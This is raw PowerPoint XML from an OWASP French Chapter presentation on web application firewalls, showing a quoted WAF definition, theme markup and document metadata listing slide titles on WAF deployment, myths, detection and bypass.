              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> 6.6, an “application firewall” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> a web application firewall (WAF), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>which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a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>security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policy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enforcement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> point </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>positioned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between</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a web application and the client end point</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>. This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>functionality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implemented</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> in software or hardware, running in an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>appliance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>device</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>, or in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>typical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> server running a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operating system. It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a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>stand-alone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>device</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>integrated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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>other</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> network components. 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383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82638" lvl="2" indent="-342900">
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Le WAF est une </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CONTRE MESURE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WASP">
  <a:themeElements>
    <a:clrScheme name="OWAS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">
      <a:majorFont>
        <a:latin typeface="Tahoma"/>
        <a:ea typeface="ヒラギノ角ゴ ProN W6"/>
        <a:cs typeface="ヒラギノ角ゴ ProN W6"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Tahoma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ea typeface="ヒラギノ角ゴ ProN W3" pitchFamily="-112" charset="-128"/>
            <a:cs typeface="ヒラギノ角ゴ ProN W3" pitchFamily="-112" charset="-128"/>
            <a:sym typeface="Arial" pitchFamily="-112" charset="0"/>
          </a:defRPr>
        </a:defPPr>
      </a:lstStyle>
    </a:lnDef>
  </a:objectDefaults>
  <a:extraClrSchemeLst>
    <a:extraClrScheme>
      <a:clrScheme name="OWAS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Pages>0</Pages>
  <Words>3654</Words>
  <Characters>0</Characters>
  <PresentationFormat>Présentation à l'écran (4:3)</PresentationFormat>
  <Lines>0</Lines>
  <Paragraphs>464</Paragraphs>
  <Slides>42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OWASP</vt:lpstr>
      <vt:lpstr>Diapositive 1</vt:lpstr>
      <vt:lpstr>Qui suis-je ?</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>OWASP en France</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Diapositive 6</vt:lpstr>
      <vt:lpstr> Je suis protégé contre les attaques, j’ai un firewall </vt:lpstr>
      <vt:lpstr>Mon site Web est sécurisé puisque il est protégé par SSL </vt:lpstr>
      <vt:lpstr>Et arriva le WAF…</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Mode Parallèle/Sonde </vt:lpstr>
      <vt:lpstr>Mode Intrusif/Reverse Proxy </vt:lpstr>
      <vt:lpstr>Intégré au serveur Web (mod_security d’Apache)</vt:lpstr>
      <vt:lpstr>Intégré au Code/a l’applicatif</vt:lpstr>
      <vt:lpstr>Choisir son WAF/son camp</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Réalités du WAF</vt:lpstr>
      <vt:lpstr>Mythes du WAF</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>WAF – En ai-je besoin ? </vt:lpstr>
      <vt:lpstr>Web Application Firewall Evaluation Criteria (WAFEC)</vt:lpstr>
      <vt:lpstr>WAF – Mise en place </vt:lpstr>
      <vt:lpstr>WAF – OWASP Top10 – Mise en Place</vt:lpstr>
      <vt:lpstr>WAF – OWASP Top10 – Mise en Place</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Détection des WAFs</vt:lpstr>
      <vt:lpstr>Détection des WAFs</vt:lpstr>
      <vt:lpstr>Détection des WAFs </vt:lpstr>
      <vt:lpstr>Bypass des WAFs</vt:lpstr>
      <vt:lpstr>Bypass des WAFs</vt:lpstr>
      <vt:lpstr>Bypass des WAFs</vt:lpstr>
      <vt:lpstr>Bypass des WAFs – le coup de la pollution des paramètres</vt:lpstr>
      <vt:lpstr>Bypass des WAFs – le coup de la pollution des paramètres</vt:lpstr>
      <vt:lpstr>Exemple vécu de l’(in)utilité recyclage déploiement d’un WAF</vt:lpstr>
      <vt:lpstr>1ere étape : le choix</vt:lpstr>
      <vt:lpstr>2ème étape : la vie du produit</vt:lpstr>
      <vt:lpstr>L’attaque</vt:lpstr>
      <vt:lpstr>La détection</vt:lpstr>
      <vt:lpstr>Le bénéfice </vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Pas de recette Miracle</vt:lpstr>
      <vt:lpstr>Diapositive 42</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>OWASP French Chapter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l’OWASP</dc:title>
  <dc:subject/>
  <dc:creator>Sebastien Gioria &amp; Ludovic Petit</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sebastien gioria</cp:lastModifiedBy>
  <cp:revision>297</cp:revision>
  <cp:lastPrinted>2009-11-09T16:29:09Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-01-15T05:46:50Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2010-01-15T05:48:00Z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-1484298201</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="_NewReviewCycle">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="_EmailSubject">
    <vt:lpwstr>le début de la prez PCI-Paris</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="_AuthorEmail">
    <vt:lpwstr>ludovic.petit@sfr.com</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="_AuthorEmailDisplayName">
    <vt:lpwstr>PETIT Ludovic</vt:lpwstr>
  </property>
</Properties>
</file>